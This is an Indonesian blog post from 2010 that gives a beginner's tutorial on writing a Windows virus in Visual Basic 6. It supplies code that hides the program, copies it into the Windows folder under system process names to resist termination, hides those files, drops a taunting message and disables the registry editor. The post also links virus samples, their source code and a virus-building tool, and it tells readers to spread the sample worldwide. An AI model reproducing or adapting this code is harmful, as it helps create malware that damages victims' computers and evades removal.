Cari Blog Ini

Memuat...

Jumat, 15 Oktober 2010

Asyik & Mantap

Sebenarnya bikin virus itu menyenangkan, apalagi klo kita sampai bisa bikin orang kebakaran jengot gara2 virus kita. Aku mau berbagi sedikit ilmu nih tentang cara bikin virus dengan VB 6. Materi ini hanya untuk coba-coba saja atau kata lainnya ini masih dasarnya. Kamu mungkin bisa mengembangkannya sendiri. Oh ya, aku juga menyertakan satu contoh virus yang sudah aku buat namanya r3d_94l4xy. Untuk materi yang lebih berat akan disambung lain waktu. Bagi yang ingin mendapatkan sample virus tertentu dengan source codenya silakan contact Johan.

Pertama, bikin form buat virus kamu pake Standart exe saja

1. Nyembuin Form
 
Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon



On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu materi yang kita pelajari, dari pada pusing, download sample virus r3d_94l4xy dan sebarin ke seluruh penjuru dunia OK!
r3d_94l4xy.rar 180 kb
Berhubung banyaknya permintaan mengenai Sample Virus dalam bentuk VB Project, jadi dibawah ini aku tambahi Source VB nya r3d_94l4xy dan virus lainnya :
r3d_94l4xy (VB_Basic).rar 95 kb
r3d_94l4xy (VB_Extreme).rar 860 kb
Source VB 4 Virus.rar 1297 kb
Trus yang ini adalah software untuk membuat virus dengan mudah, coba deh !
Visual Basic Virus Maker 32 RC 03.rar 1560 kb
Trus yang terakhir ini adalah Artikel tentang Regsitry, bisa kamu pelajari sampai tua!
1001 Malam Mengedit Registry.rar 41 kb
Teknik Bikin Virus Komputer.rar 20 kb
Tak kasih bonus ya Internet Maniac dan Harpot Infeksi Exe, tau kan fungsinya!
Internet Maniac.rar 59 kb
Harpot Infeksi Exe.rar 881 kb
Segini dulu aja ya, soalnya aku lagi persiapan buat lomba Debat Bahasa Inggris di Jember, tanggal 25 November nanti. Dan jangan lupa doain aku biar juara 1, OK ! Dan seperti biasanya, kalau ada pertanyaan, silakan bertanya jangan dipendam. Selamat Belajar !

Tidak ada komentar:

Poskan Komentar